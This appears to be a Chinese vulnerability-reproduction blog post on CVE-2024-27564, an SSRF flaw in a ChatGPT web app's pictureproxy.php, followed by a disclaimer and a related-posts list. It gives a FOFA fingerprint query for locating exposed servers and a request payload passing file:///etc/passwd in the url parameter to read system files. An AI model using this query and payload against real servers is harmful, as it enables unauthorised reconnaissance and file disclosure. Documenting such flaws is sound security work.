【漏洞复现】chatgpt pictureproxy.php SSRF漏洞(CVE-2024-27564)

0x01 漏洞概述

ChatGPT pictureproxy.php接口存在服务器端请求伪造 漏洞(SSRF) ,未授权的攻击者可以通过将构建的 URL 注入 url参数来强制应用程序发出任意请求。

0x02 测绘语句

复制代码
fofa: icon_hash="-1999760920"

0x03 漏洞复现

复制代码
GET /pictureproxy.php?url=file:///etc/passwd HTTP/1.1

0x04 影响范围

复制代码
chatgpt

0x05 免责声明

复制代码
本文所涉及的任何技术、信息或工具,仅供学习和参考之用。

请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。

作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。
相关推荐
wuyk5553 小时前
第2章:六步换相原理全解+STM32工程实战
c语言·开发语言·stm32·单片机·嵌入式硬件
hey_sml3 小时前
JAVA每日一学---CompletableFuture中thenApply与thenCompose区别详解
java·开发语言
萧瑟余晖5 小时前
Java深入解析篇十七之SpringCloud
java·开发语言
ttod_qzstudio5 小时前
Java 常用语法极简通关(五):类与对象——字段、方法、构造器、this 与 static
java·开发语言·python
萧瑟余晖7 小时前
Java深入解析篇十七之Spring Security
java·开发语言·spring
二十雨辰9 小时前
[Java]-Spring面试题
java·开发语言
_oP_i10 小时前
python 后缀 mjs文件
开发语言·python
萧瑟余晖10 小时前
Java深入解析篇二十二之虚拟线程
java·开发语言
油丶酸萝卜别吃10 小时前
Java 集合类全景介绍
java·开发语言
Iruoyaoxh11 小时前
类和对象~
开发语言·c++